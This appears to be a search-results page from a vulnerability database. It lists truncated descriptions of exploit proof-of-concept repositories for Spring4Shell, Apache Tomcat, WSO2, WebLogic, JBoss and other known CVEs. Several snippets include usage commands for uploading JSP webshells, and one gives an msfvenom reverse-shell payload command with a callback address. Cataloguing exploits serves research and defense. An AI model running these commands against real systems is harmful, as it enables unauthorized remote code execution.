Lucene search
+L

3081 matches found

Kitploit
Kitploit
added 2026/09/15 2:21 p.m.10 views

spring4shell-exploit-poc

Spring4Shell Exploit POC Exploit a Spring Application vulnerable to the Spring4Shell vulnerability. Read more about Spring4shell on our blog. Usage Requirements: Docker and docker-compose root@kitploit: $ ./exploit.sh Vulnerable Spring Application The vulnerable Spring application contains a GET...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/15 2:08 p.m.6 views

spring4shell-CVE-2022-22965

Simple Spring4Shell POC Check if endpoint is vulnerable python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting --check Exploit vulnerable endpoint python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting -f shell.jsp --exploit Execute command on uploaded webshe...

9.8CVSS7.7AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/15 2:07 p.m.7 views

Spring4Shell-POC

Spring4Shell-POC Local reproduction process of Spring4Shell vulnerability Environment Preparation Environment: docker, docker-compose mvn package, generate ./target/ROOT.warshell mvn package root@kitploit: Start the serviceshell docker-compose up -d Stop serviceshell docker-compose down...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/15 1:32 p.m.5 views

CVE-2024-21733

CVE-2024-21733-POC Notes: 1. tomcat English environment 2. Specific constructed backend code, as shown in ROOT/vulnerable.jsp 3. If needed, modify the server address and port in the script. Default 127.0.0.1:8080 4. Timeout trigger, default 20 seconds, usually less than this time Process: 1...

5.3CVSS7.6AI score0.14286EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/15 1:24 p.m.8 views

CVE-2022-22965

Spring Boot CVE-2022-22965 Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5 🚀 Getting Started 1. Download the distribution code from https://github.com/itsecurityco/CVE-2022-22965/archive/refs/heads/master.zip and unzip it. 2. Run docker compose up --build to build and start the...

9.8CVSS7.8AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/15 1:23 p.m.8 views

CVE-2025-24813

🚨 CVE-2025-24813 – Apache Tomcat PUT JSP RCE Exploit This repository contains a complete proof-of-concept PoC for CVE-2025-24813 , a Remote Code Execution RCE vulnerability in Apache Tomcat using the HTTP PUT method to deploy a malicious JSP web shell. 🔥 This exploit demonstrates how an attacker...

10CVSS8.7AI score0.99927EPSS
SaveExploits51
Kitploit
Kitploit
added 2026/09/15 12:57 p.m.8 views

CVE-2022-29464

CVE-2022-29464 WSO2 RCE Usage : root@kitploit: python3 exploit.py https://host:9443/ ArbitraryShellName.jsp...

10CVSS8.7AI score0.99999EPSS
SaveExploits22
Kitploit
Kitploit
added 2026/09/15 12:04 p.m.7 views

ghostcat

This tool exploits an LFI vulnerability within Apache Tomcat named CVE-2020-1938 to not only view sensitive files, but also to run malicious JSP payloads. It can be downloaded here you will need to run it from the command line Usage:...

9.8CVSS7.7AI score0.9927EPSS
SaveExploits51References1
Kitploit
Kitploit
added 2026/09/15 12:03 p.m.9 views

CVE-2009-2265

Version: ColdFusion 8.0.1 CVE-2009-2265 msfvenom -p java/jspshellreversetcp LHOST=10.10.14.12 LPORT=4444 -f raw shell.jsp python upload.py 10.10.10.11 8500 shell.jsp Example :...

7.5CVSS6.8AI score0.83744EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/15 11:57 a.m.8 views

CVE-2022-22965

CVE-2022-22965-POC CVE-2022-22965 spring-core batch detection script Disclaimer: This script is for learning purposes only. Prohibited for illegal use. If there is any malicious destruction or illegal use, it has nothing to do with me!!! Usage: python3 CVE-2022-22965-POC.py url.txt After successf...

9.8CVSS7.8AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/15 11:09 a.m.5 views

Spring4Shell-CVE-2022-22965-POC

Spring4Shell-CVE-2022-22965-POC root@kitploit: ghost㉿uchiha:$ ./exploit.py --help usage: exploit.py -h -f FILENAME -p PASSWORD -d DIRECTORY url Spring4Shell RCE Proof of Concept positional arguments: url Target URL options: -h, --help show this help message and exit -f FILENAME, --filename FILENA...

9.8CVSS8AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/15 11:04 a.m.7 views

Confluence-CVE-2022-26134

Confluence-CVE-2022-26134 This repository talks about Zero-Day Exploitation of Atlassian Confluence, it's defense and analysis point of view from a SecOps or Blue Team perspective Index About Timeline Understanding the Exploit List of IOCs Detection Strategy Mitigation Plans References About Over...

9.8CVSS8.6AI score0.99999EPSS
SaveExploits77References3
Kitploit
Kitploit
added 2026/09/15 10:59 a.m.13 views

wso2-rce-cve-2022-29464

CVE-2022-29464 WSO2 RCE CVE-2022-29464 exploit. Details CVE-2022-29464 is critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading...

10CVSS8.7AI score0.99999EPSS
SaveExploits22References2
Kitploit
Kitploit
added 2026/09/15 9:44 a.m.6 views

jboss-autopwn

jboss-autopwn JBoss Autopwn as featured at BlackHat Europe 2010 - this version incorporates CVE-2010-0738 the JBoss authentication bypass VERB manipulation vulnerability as discovered by Minded Security C. Papathanasiou 2010 INTRODUCTION This JBoss script deploys a JSP shell on the target JBoss A...

5.3CVSS6.9AI score0.79415EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/15 8:37 a.m.6 views

CVE-2021-26828_ScadaBR_RCE

POC CVE-2021-26828ScadaBRRemoteCodeExecution ScadaBR 0.9.1 on Linux and through 1.0 and 1.12.4CE on Windows allows remote authenticated users to upload and execute arbitrary JSP files via 'viewedit.shtm' and Remote Code Execution. Exploit Usage Commands: Windows: $ sudo python WinScadaRCE.py Linu...

8.8CVSS8.5AI score0.39356EPSS
SaveExploits8
Kitploit
Kitploit
added 2026/09/15 8:33 a.m.2 views

Incident-Response-Report-TeamCity-Compromise-CVE-2024-27198-

Incident Response Report: TeamCity Compromise CVE-2024-27198 Analyst: Belal Abdelsalam Date: July 2026 Lab/Environment: CyberDefenders JetBrains 📄 Executive Summary This report documents the forensic analysis of a compromised JetBrains TeamCity server version 2023.11.3. By analyzing the provided...

9.8CVSS8.5AI score0.99938EPSS
SaveExploits25
Kitploit
Kitploit
added 2026/09/15 8:01 a.m.12 views

CVE-2018-2628

CVE-2018-2628 WebLogic Deserialization Vulnerability Reproduction weblogic getshell python CVE-2018-2628-Getshell.py ip port shell1.jsp root@kitploit: C:\Users\CTF\Desktoppython CVE-2018-2628-Getshell.py 10.10.20.166 7001 jason1.jsp / \ \ / / | | \ / / |/ \ | \ / /| \ / \ | | \ \ / /| | | | | || ...

9.8CVSS8.7AI score0.99448EPSS
SaveExploits70
Kitploit
Kitploit
added 2026/09/15 6:59 a.m.79 views

spring4shell-poc

Spring4Shell POC Description of the vulnerability: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Construction of the POC: https://github.com/BobTheShoplifter/Spring4Shell-POC Steps to Build/Run Tested with JDK 11.0.14, Spring Boot 2.6.5, and Apache Tomcat 9.0.60 Run...

5.4AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/15 6:59 a.m.9 views

spring4shell-poc

Spring4Shell POC Descripción de la vulnerabilidad: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Construcción del POC: https://github.com/BobTheShoplifter/Spring4Shell-POC Pasos para construir/ejecutar Probado con JDK 11.0.14, Spring Boot 2.6.5 y Apache Tomcat 9.0.6...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/15 6:53 a.m.5 views

CVE-2017-12615-PoC

CVE 2017-12615 Apache Tomcat Windows RCE ⚠️警告 这是一个针对已知 CVE 的概念验证环境与利用脚本,仅供学习和教育目的使用。 请勿在未获得明确授权的系统上使用这些脚本或技术。未经授权访问或利用系统是非法的,且违反道德。 📃描述 这是针对 CVE 2017-12615 的概念验证环境与利用脚本。 该漏洞出现在 Tomcat 中,需满足以下条件: 1. Servlet 上下文配置了 readonly=false 2. 允许 HTTP PUT 请求 攻击者可通过 PUT 请求上传 JSP 文件。Apache Tomcat...

8.1CVSS7.9AI score0.99607EPSS
SaveExploits20
Rows per page
Query Builder